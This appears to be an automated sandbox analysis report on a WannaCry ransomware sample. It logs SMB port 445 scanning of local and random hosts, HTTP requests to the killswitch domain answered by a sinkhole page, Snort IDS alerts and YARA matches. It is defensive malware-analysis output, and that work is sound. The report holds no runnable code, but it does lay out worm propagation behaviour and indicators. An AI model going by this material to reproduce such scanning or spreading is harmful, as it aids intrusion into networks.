                Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
                Source: mbXvGlj2dR.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                Source: unknownHTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:50321 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:50404 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:50638 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:51267 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.152.133:443 -> 192.168.2.5:52134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:53313 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:55274 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:57862 version: TLS 1.2

                Networking

                barindex
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Dec 2022 09:04:11 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 77d7b047dffb9963-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Dec 2022 09:04:12 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 77d7b0502e7f9007-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Dec 2022 09:04:14 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 77d7b05cea9d9164-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.5:49177 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.5:49704 -> 104.16.173.80:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.5:49704
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.5:49724 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.5:49705 -> 104.16.173.80:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.5:49705
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.5:61452 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.5:49729 -> 104.17.244.81:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.17.244.81:80 -> 192.168.2.5:49729
                Source: global trafficTCP traffic: Count: 147 IPs: 41.203.13.19,41.203.13.18,41.203.13.17,41.203.13.109,41.203.13.12,41.203.13.108,41.203.13.11,41.203.13.99,41.203.13.107,41.203.13.10,41.203.13.98,41.203.13.106,41.203.13.97,41.203.13.105,41.203.13.16,41.203.13.104,41.203.13.15,41.203.13.103,41.203.13.14,41.203.13.102,41.203.13.13,41.203.13.101,41.203.13.100,41.203.13.29,41.203.13.28,41.203.13.23,41.203.13.119,41.203.13.22,41.203.13.118,41.203.13.21,41.203.13.117,41.203.13.20,41.203.13.116,41.203.13.27,41.203.13.115,41.203.13.26,41.203.13.114,41.203.13.25,41.203.13.113,41.203.13.24,41.203.13.112,41.203.13.111,41.203.13.110,41.203.13.30,41.203.13.78,41.203.13.77,41.203.13.129,41.203.13.76,41.203.13.128,41.203.13.75,41.203.13.127,41.203.13.126,41.203.13.125,41.203.13.124,41.203.13.79,41.203.13.123,41.203.13.81,41.203.13.122,41.203.13.80,41.203.13.121,41.203.13.120,41.203.13.85,41.203.13.84,41.203.13.83,41.203.13.82,41.203.13.89,41.203.13.88,41.203.13.87,41.203.13.139,41.203.13.86,41.203.13.138,41.203.13.137,41.203.13.136,41.203.13.135,41.203.13.134,41.203.13.92,41.203.13.133,41.203.13.91,41.203.13.132,41.203.13.90,41.203.13.131,41.203.13.130,41.203.13.96,41.203.13.95,41.203.13.94,41.203.13.93,41.203.13.56,41.203.13.55,41.203.13.54,41.203.13.53,41.203.13.59,41.203.13.147,41.203.13.58,41.203.13.146,41.203.13.57,41.203.13.145,41.203.13.144,41.203.13.143,41.203.13.142,41.203.13.141,41.203.13.63,41.203.13.140,41.203.13.62,41.203.13.61,41.203.13.60,41.203.13.67,41.203.13.66,41.203.13.65,41.203.13.64,41.203.13.69,41.203.13.68,41.203.13.70,41.203.13.74,41.203.13.73,41.203.13.72,41.203.13.71,41.203.13.39,41.203.13.34,41.203.13.5,41.203.13.33,41.203.13.4,41.203.13.32,41.203.13.3,41.203.13.31,41.203.13.2,41.203.13.9,41.203.13.38,41.203.13.8,41.203.13.37,41.203.13.7,41.203.13.36,41.203.13.35,41.203.13.6,41.203.13.41,41.203.13.1,41.203.13.40,41.203.13.45,41.203.13.44,41.203.13.43,41.203.13.42,41.203.13.49,41.203.13.48,41.203.13.47,41.203.13.46,41.203.13.52,41.203.13.51,41.203.13.50
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: unknownNetwork traffic detected: IP country count 21
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50638
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52134
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50638 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51267
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55274
                Source: unknownNetwork traffic detected: HTTP traffic on port 53313 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55274 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50404
                Source: unknownNetwork traffic detected: HTTP traffic on port 52134 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51267 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53313
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57862
                Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 200.21.227.70
                Source: unknownTCP traffic detected without corresponding DNS query: 212.44.196.231
                Source: unknownTCP traffic detected without corresponding DNS query: 160.90.130.250
                Source: unknownTCP traffic detected without corresponding DNS query: 85.142.2.233
                Source: unknownTCP traffic detected without corresponding DNS query: 83.174.153.32
                Source: unknownTCP traffic detected without corresponding DNS query: 156.87.122.211
                Source: unknownTCP traffic detected without corresponding DNS query: 113.0.164.218
                Source: unknownTCP traffic detected without corresponding DNS query: 40.228.2.212
                Source: unknownTCP traffic detected without corresponding DNS query: 207.148.171.202
                Source: unknownTCP traffic detected without corresponding DNS query: 56.36.246.18
                Source: unknownTCP traffic detected without corresponding DNS query: 98.52.20.72
                Source: unknownTCP traffic detected without corresponding DNS query: 192.254.148.131
                Source: unknownTCP traffic detected without corresponding DNS query: 91.252.232.99
                Source: unknownTCP traffic detected without corresponding DNS query: 63.49.180.232
                Source: unknownTCP traffic detected without corresponding DNS query: 45.33.91.132
                Source: unknownTCP traffic detected without corresponding DNS query: 134.162.123.20
                Source: unknownTCP traffic detected without corresponding DNS query: 66.45.115.36
                Source: unknownTCP traffic detected without corresponding DNS query: 150.48.163.125
                Source: unknownTCP traffic detected without corresponding DNS query: 68.39.48.208
                Source: unknownTCP traffic detected without corresponding DNS query: 39.168.35.151
                Source: unknownTCP traffic detected without corresponding DNS query: 93.50.247.138
                Source: unknownTCP traffic detected without corresponding DNS query: 214.55.37.32
                Source: unknownTCP traffic detected without corresponding DNS query: 42.45.174.121
                Source: unknownTCP traffic detected without corresponding DNS query: 5.150.178.155
                Source: unknownTCP traffic detected without corresponding DNS query: 190.221.196.201
                Source: unknownTCP traffic detected without corresponding DNS query: 204.157.223.161
                Source: unknownTCP traffic detected without corresponding DNS query: 111.53.16.33
                Source: unknownTCP traffic detected without corresponding DNS query: 148.253.43.220
                Source: unknownTCP traffic detected without corresponding DNS query: 148.253.43.220
                Source: unknownTCP traffic detected without corresponding DNS query: 202.147.41.118
                Source: unknownTCP traffic detected without corresponding DNS query: 142.243.186.244
                Source: unknownTCP traffic detected without corresponding DNS query: 89.62.93.203
                Source: unknownTCP traffic detected without corresponding DNS query: 176.157.230.78
                Source: unknownTCP traffic detected without corresponding DNS query: 205.206.220.69
                Source: unknownTCP traffic detected without corresponding DNS query: 48.144.79.129
                Source: unknownTCP traffic detected without corresponding DNS query: 30.123.236.167
                Source: unknownTCP traffic detected without corresponding DNS query: 222.244.6.150
                Source: svchost.exe, 0000000E.00000002.818600699.00000202ACC99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: svchost.exe, 0000000E.00000002.818470414.00000202ACC18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: mssecsvc.exe, 00000005.00000002.316368206.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjapo.
                Source: mssecsvc.exe.3.drString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: mssecsvc.exe, 00000007.00000002.318976975.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                Source: mssecsvc.exe, 00000008.00000002.817864994.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
                Source: mssecsvc.exe, 00000005.00000002.316398385.0000000000DB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kryptoslogic.com
                Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: unknownHTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:50321 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:50404 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:50638 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:51267 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.152.133:443 -> 192.168.2.5:52134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:53313 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:55274 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.90.153.243:443 -> 192.168.2.5:57862 version: TLS 1.2

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!9_2_004014A6
                Source: Yara matchFile source: mbXvGlj2dR.dll, type: SAMPLE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE
